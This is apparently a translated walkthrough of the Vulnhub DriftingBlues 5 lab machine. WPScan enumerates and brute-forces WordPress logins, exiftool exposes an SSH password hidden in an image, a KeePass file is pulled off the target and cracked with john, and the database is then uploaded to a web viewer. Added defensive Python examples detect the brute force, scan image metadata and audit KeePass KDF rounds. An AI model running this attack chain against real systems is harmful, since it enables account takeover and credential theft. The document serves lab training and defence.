 | Style URL: http://192.168.56.194/wp-content/themes/twentytwentyone/style.css?ver=1.1
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.194/wp-content/themes/twentytwentyone/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <======================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=======================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] abuzerkomurcu
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.194/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] gill
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] collins
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] satanic
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gadd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Wp Login against 5 user/s
[SUCCESS] - gill / interchangeable                                                                                                                                                                                                   
Trying gadd / Category Time: 00:00:59 <=============================================================================================================================                            > (7315 / 8825) 82.88%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: gill, Password: interchangeable

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Nov 19 23:05:35 2022
[+] Requests Done: 7520
[+] Cached Requests: 11
[+] Data Sent: 2.456 MB
[+] Data Received: 52.755 MB
[+] Memory used: 311.098 MB
[+] Elapsed time: 00:01:02
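The WPScan run above shows three behaviours that leave a clear trace in the web server's access log: author-ID enumeration through `?author=N`, a hit on the `wp-json/wp/v2/users` endpoint, and a burst of POSTs to `wp-login.php`. Below is an added example (written for this page, not part of the original walkthrough or of WPScan) that parses Apache combined-format log lines and flags each of those per source IP. The log lines, IP addresses and thresholds are constructed for the example; the only WordPress-specific assumption is that a failed login re-renders the form with HTTP 200 while a successful one answers with a 302 redirect.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" line: ip ident user [time] "METHOD path proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
AUTHOR_RE = re.compile(r"[?&]author=(\d+)")


def parse_line(line: str):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyse(lines, login_threshold: int = 20, author_threshold: int = 5):
    """Flag, per source IP, the three WPScan behaviours: author-ID enumeration,
    the REST users endpoint, and a run of POSTs to wp-login.php.
    A failed WordPress login re-renders the form (HTTP 200); a successful one
    redirects (HTTP 302), so a 302 after many 200s is the moment a guess worked."""
    stats = defaultdict(lambda: {"failed_logins": 0, "author_ids": set(),
                                 "users_api": 0, "success_after_failures": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s = stats[rec["ip"]]
        path = rec["path"]
        if rec["method"] == "POST" and path.split("?")[0].endswith("/wp-login.php"):
            if rec["status"] == 200:
                s["failed_logins"] += 1
            elif rec["status"] == 302 and s["failed_logins"] >= login_threshold:
                s["success_after_failures"] += 1
        m = AUTHOR_RE.search(path)
        if m:
            s["author_ids"].add(int(m.group(1)))
        if "/wp-json/wp/v2/users" in path:
            s["users_api"] += 1

    findings = []
    for ip, s in stats.items():
        if s["failed_logins"] >= login_threshold:
            findings.append((ip, "wp-login brute force", s["failed_logins"]))
        if s["success_after_failures"]:
            findings.append((ip, "login success after brute force", s["success_after_failures"]))
        if len(s["author_ids"]) >= author_threshold:
            findings.append((ip, "author id enumeration", len(s["author_ids"])))
        if s["users_api"]:
            findings.append((ip, "REST users endpoint enumeration", s["users_api"]))
    return sorted(findings)


def sample_log():
    """Constructed log lines for this example (not taken from the target machine)."""
    atk, ok = "203.0.113.7", "198.51.100.4"
    ts = "19/Nov/2022:23:04:%02d -0500"
    ua = '"-" "Mozilla/5.0"'
    lines = [f'{atk} - - [{ts % i}] "GET /?author={i} HTTP/1.1" 301 0 {ua}'
             for i in range(1, 11)]
    lines.append(f'{atk} - - [{ts % 12}] "GET /index.php/wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 812 {ua}')
    lines += [f'{atk} - - [{ts % (13 + i % 40)}] "POST /wp-login.php HTTP/1.1" 200 4120 {ua}'
              for i in range(25)]
    lines.append(f'{atk} - - [{ts % 59}] "POST /wp-login.php HTTP/1.1" 302 0 {ua}')
    lines.append(f'{ok} - - [{ts % 30}] "GET /index.php/2021/02/hello-world/ HTTP/1.1" 200 9312 {ua}')
    lines.append(f'{ok} - - [{ts % 31}] "POST /wp-login.php HTTP/1.1" 302 0 {ua}')
    lines.append("not an access-log line")
    return lines


if __name__ == "__main__":
    for ip, kind, count in analyse(sample_log()):
        print(f"{ip:15} {kind:35} {count}")
```

The thresholds are deliberately low so the constructed sample trips them; on a real site they should be tuned to the normal login volume, and the "login success after brute force" finding is the one worth paging on, since it marks a credential that is now in use.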
                                                            

One user's password was cracked successfully; log in with it:

Logged into the WordPress admin back end successfully.

Found an image that is not shown on the public site; download it to Kali Linux for analysis. It is a PNG file, so start with exiftool:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ exiftool dblogo.png 
ExifTool Version Number         : 12.44
File Name                       : dblogo.png
Directory                       : .
File Size                       : 19 kB
File Modification Date/Time     : 2022:11:19 23:08:35-05:00
File Access Date/Time           : 2022:11:19 23:08:35-05:00
File Inode Change Date/Time     : 2022:11:19 23:08:35-05:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 300
Image Height                    : 300
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
SRGB Rendering                  : Perceptual
Gamma                           : 2.2
Pixels Per Unit X               : 2835
Pixels Per Unit Y               : 2835
Pixel Units                     : meters
XMP Toolkit                     : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
Creator Tool                    : Adobe Photoshop CC 2018 (Windows)
Create Date                     : 2021:02:24 02:55:28+03:00
Metadata Date                   : 2021:02:24 02:55:28+03:00
Modify Date                     : 2021:02:24 02:55:28+03:00
Instance ID                     : xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
Document ID                     : adobe:docid:photoshop:7232d876-a1d0-044b-9604-08837143888b
Original Document ID            : xmp.did:5890be6c-649b-0248-af9b-19889727200c
Color Mode                      : RGB
ICC Profile Name                : sRGB IEC61966-2.1
Format                          : image/png
History Action                  : created, saved
History Instance ID             : xmp.iid:5890be6c-649b-0248-af9b-19889727200c, xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
History When                    : 2021:02:24 02:55:28+03:00, 2021:02:24 02:55:28+03:00
History Software Agent          : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed                 : /
Text Layer Name                 : ssh password is 59583hello of course it is lowercase maybe not
Text Layer Text                 : ssh password is 59583hello of course it is lowercase maybe not :)
Document Ancestors              : adobe:docid:photoshop:871a8adf-5521-894c-8a18-2b27c91a893b
Image Size                      : 300x300
Megapixels                      : 0.090
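exiftool reads the "Text Layer Text" value out of the XMP packet that Photoshop stores in a PNG `iTXt` chunk; the same chunk family (`tEXt`, `zTXt`, `iTXt`) is where comments, software tags and other leftover text live. The following is an added example, not part of the original post or of exiftool, that builds a tiny PNG with all three chunk types, walks the chunks with CRC checks, pulls the text fields out, and flags any that mention credential-like words. The image, the XMP content and the marker words are constructed for the example; the chunk layouts follow the PNG specification.

```python
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC-32 over type+data."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))


def build_sample_png() -> bytes:
    """Constructed 1x1 RGBA PNG carrying the chunk types that hold text:
    tEXt, zTXt and an iTXt XMP packet with a Photoshop text layer.
    All strings are made up for this example."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)          # 1x1, 8-bit, RGBA
    idat = zlib.compress(b"\x00" + b"\x00\x00\x00\xff")          # filter byte + one pixel
    xmp = (b"<x:xmpmeta xmlns:x='adobe:ns:meta/'><photoshop:TextLayers><rdf:li>"
           b"<photoshop:LayerName>hint</photoshop:LayerName>"
           b"<photoshop:LayerText>ssh password is EXAMPLE-NOT-REAL</photoshop:LayerText>"
           b"</rdf:li></photoshop:TextLayers></x:xmpmeta>")
    # iTXt: keyword NUL, compression flag, compression method, language NUL, translated keyword NUL, text
    itxt = b"XML:com.adobe.xmp\x00" + b"\x00\x00" + b"\x00" + b"\x00" + xmp
    text = b"Comment\x00constructed sample, nothing sensitive"   # tEXt: keyword NUL text
    ztxt = b"Software\x00" + b"\x00" + zlib.compress(b"constructed-tool 1.0")  # zTXt: keyword NUL method deflate
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"tEXt", text)
            + _chunk(b"zTXt", ztxt) + _chunk(b"iTXt", itxt)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


def iter_chunks(png: bytes):
    """Yield (type, data) for every chunk, verifying each CRC on the way."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(png):
        length, ctype = struct.unpack_from(">I4s", png, pos)
        if pos + 12 + length > len(png):
            raise ValueError(f"truncated {ctype!r} chunk")
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack_from(">I", png, pos + 8 + length)
        if zlib.crc32(ctype + data) != crc:
            raise ValueError(f"CRC mismatch in {ctype!r} chunk")
        yield ctype, data
        pos += 12 + length
        if ctype == b"IEND":
            break


def extract_text_metadata(png: bytes) -> dict:
    """Return {keyword: text} collected from tEXt, zTXt and iTXt chunks."""
    found = {}
    for ctype, data in iter_chunks(png):
        if ctype == b"tEXt":
            key, _, text = data.partition(b"\x00")
            found[key.decode("latin-1")] = text.decode("latin-1")
        elif ctype == b"zTXt":
            key, _, rest = data.partition(b"\x00")           # rest = method byte + deflate stream
            found[key.decode("latin-1")] = zlib.decompress(rest[1:]).decode("latin-1")
        elif ctype == b"iTXt":
            key, _, rest = data.partition(b"\x00")
            compressed = rest[0] == 1
            _lang, _, rest = rest[2:].partition(b"\x00")
            _translated, _, text = rest.partition(b"\x00")
            if compressed:
                text = zlib.decompress(text)
            found[key.decode("latin-1")] = text.decode("utf-8")
    return found


def layer_texts(png: bytes):
    """Photoshop text layers inside the XMP packet (what exiftool prints as Text Layer Text)."""
    xmp = extract_text_metadata(png).get("XML:com.adobe.xmp", "")
    return re.findall(r"<photoshop:LayerText>(.*?)</photoshop:LayerText>", xmp, re.S)


def find_secret_hints(png: bytes, markers=("password", "passwd", "ssh", "secret", "token")):
    """(field, text) pairs whose metadata text mentions a credential-like word."""
    return [(field, text) for field, text in extract_text_metadata(png).items()
            if any(m in text.lower() for m in markers)]


if __name__ == "__main__":
    sample = build_sample_png()
    print(layer_texts(sample))
    for field, _ in find_secret_hints(sample):
        print("credential-like text in metadata field:", field)
```

Running `find_secret_hints` over images before they are published (or over an upload directory) catches the class of leak this box demonstrates: the text layer never renders in the flattened image, so nothing on screen hints that the metadata carries a secret.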

The image actually hides the SSH password, so the next step is to log in over SSH:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ ssh [email protected]            
The authenticity of host '192.168.56.194 (192.168.56.194)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:35: [hashed name]
    ~/.ssh/known_hosts:37: [hashed name]
    ~/.ssh/known_hosts:38: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.194' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gill@driftingblues:~$ id
uid=1000(gill) gid=1000(gill) groups=1000(gill)
gill@driftingblues:~$ ls
keyfile.kdbx  user.txt
gill@driftingblues:~$ cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█



gill@driftingblues:~$ ls -alh
total 24K
drwxr-xr-x 4 gill gill 4.0K Nov 19 22:11 .
drwxr-xr-x 4 root root 4.0K Feb 24  2021 ..
drwx------ 3 gill gill 4.0K Nov 19 22:11 .gnupg
-rwx------ 1 gill gill 2.0K Feb 24  2021 keyfile.kdbx
drwx------ 2 gill gill 4.0K Feb 24  2021 .ssh
-r-x------ 1 gill gill 1.8K Jan  3  2021 user.txt

Got the user flag.

Privilege escalation

Upload the linpeas.sh script to /tmp on the target, make it executable and run it; its output contained nothing of value.

However, gill's home directory contains a .kdbx file, which is a KeePass database; download it to the local machine:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ wget http://192.168.56.194:8000/keyfile.kdbx
--2022-11-19 23:30:32--  http://192.168.56.194:8000/keyfile.kdbx
Connecting to 192.168.56.194:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2030 (2.0K) [application/octet-stream]
Saving to: ‘keyfile.kdbx’

keyfile.kdbx                                              100%[==================================================================================================================================>]   1.98K  --.-KB/s    in 0s      

2022-11-19 23:30:32 (157 MB/s) - ‘keyfile.kdbx’ saved [2030/2030]

                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ ls
37902.php  db1.jpg  dblogo.png  keyfile.kdbx  linpeas.sh  nmap_full_scan  pass_wordlist  pubring.kbx  trustdb.gpg
                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ keepass2john keyfile.kdbx > hashes

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porsiempre       (keyfile)     
1g 0:00:00:48 DONE (2022-11-19 23:31) 0.02047g/s 141.0p/s 141.0c/s 141.0C/s winston1..palomita
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
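The three "Cost" lines john prints come straight from the KDBX outer header: the transform (KDF) round count, the file format version, and the cipher. Those are also the numbers a defender should audit, because a low round count is what lets a wordlist run at 141 guesses per second here. The example below is added for this page (it is neither the blog's code nor part of john or KeePass): it writes a constructed KDBX 3.1 header, parses it back, and estimates the guess rate for a different round count by scaling the rate measured above. The KDBX 3.x field layout and the AES/ChaCha20 cipher UUIDs are the publicly documented ones; the 1,000,000-round minimum is an assumed policy value, not a KeePass default.

```python
import struct
import uuid

KDBX_SIG1 = 0x9AA2D903
KDBX_SIG2 = 0xB54BFB67

# Outer-header field IDs in KDBX 3.x (the file "version 2" that john reports)
(FIELD_END, FIELD_COMMENT, FIELD_CIPHER_ID, FIELD_COMPRESSION, FIELD_MASTER_SEED,
 FIELD_TRANSFORM_SEED, FIELD_TRANSFORM_ROUNDS, FIELD_ENCRYPTION_IV,
 FIELD_PROTECTED_STREAM_KEY, FIELD_STREAM_START_BYTES, FIELD_INNER_RANDOM_STREAM_ID) = range(11)

CIPHER_NAMES = {
    uuid.UUID("31c1f2e6-bf71-4350-be58-05216afc5aff"): "AES-256",
    uuid.UUID("d6038a2b-8b6f-4cb5-a524-339a31dbb59a"): "ChaCha20",
}
AES_UUID = uuid.UUID("31c1f2e6-bf71-4350-be58-05216afc5aff")


def build_sample_header(rounds: int, cipher: uuid.UUID = AES_UUID) -> bytes:
    """Constructed KDBX 3.1 outer header (seeds/IV are zeros) followed by dummy ciphertext.
    Not a real database: only the header is meaningful."""
    def field(fid: int, data: bytes) -> bytes:
        return struct.pack("<BH", fid, len(data)) + data          # id, uint16 size, payload

    blob = struct.pack("<II", KDBX_SIG1, KDBX_SIG2)
    blob += struct.pack("<HH", 1, 3)                               # minor=1, major=3 -> "3.1"
    blob += field(FIELD_CIPHER_ID, cipher.bytes)
    blob += field(FIELD_COMPRESSION, struct.pack("<I", 1))         # 1 = gzip inner payload
    blob += field(FIELD_MASTER_SEED, bytes(32))
    blob += field(FIELD_TRANSFORM_SEED, bytes(range(32)))
    blob += field(FIELD_TRANSFORM_ROUNDS, struct.pack("<Q", rounds))
    blob += field(FIELD_ENCRYPTION_IV, bytes(16))
    blob += field(FIELD_PROTECTED_STREAM_KEY, bytes(32))
    blob += field(FIELD_STREAM_START_BYTES, bytes(32))
    blob += field(FIELD_INNER_RANDOM_STREAM_ID, struct.pack("<I", 2))
    blob += field(FIELD_END, b"\r\n\r\n")
    return blob + b"\x00" * 64


def parse_kdbx_header(blob: bytes) -> dict:
    """Read the signature, version and outer-header fields of a KDBX 3.x file."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", blob, 0)
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KDBX file")
    if major != 3:
        raise ValueError(f"only KDBX 3.x headers are handled here, got {major}.{minor}")
    pos, fields = 12, {}
    while True:
        fid, size = struct.unpack_from("<BH", blob, pos)
        data = blob[pos + 3:pos + 3 + size]
        pos += 3 + size
        if fid == FIELD_END:
            break
        fields[fid] = data
    cipher = uuid.UUID(bytes=fields[FIELD_CIPHER_ID])
    return {
        "version": f"{major}.{minor}",
        "cipher": CIPHER_NAMES.get(cipher, str(cipher)),
        "transform_rounds": struct.unpack("<Q", fields[FIELD_TRANSFORM_ROUNDS])[0],
        "compressed": struct.unpack("<I", fields[FIELD_COMPRESSION])[0] == 1,
        "header_length": pos,
    }


def audit_kdf_cost(info: dict, reference_rate: float = 141.0,
                   reference_rounds: int = 60000, min_rounds: int = 1_000_000) -> dict:
    """Scale the guess rate john achieved above (141 p/s at 60000 rounds) to this file's
    round count; AES-KDF cost is linear in rounds. min_rounds is an assumed policy value."""
    rounds = info["transform_rounds"]
    return {
        "transform_rounds": rounds,
        "meets_minimum": rounds >= min_rounds,
        "estimated_guesses_per_second": reference_rate * reference_rounds / rounds,
    }


if __name__ == "__main__":
    for r in (60000, 6_000_000):
        info = parse_kdbx_header(build_sample_header(r))
        print(info, audit_kdf_cost(info))
```

For the real `keyfile.kdbx`, `parse_kdbx_header(open("keyfile.kdbx", "rb").read())` should report the same 60000 rounds and AES cipher that john printed. Raising rounds to the point where one key transform takes about a second on the owner's machine cuts the offline guess rate by the same factor; it does not rescue a password that sits near the front of rockyou, so the round count and the password strength have to be fixed together.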

Open https://app.keeweb.info/

Upload keyfile.kdbx to that site and enter the password cracked with John.

From: https://www.cnblogs.com/jason-huawen/p/16908250.html
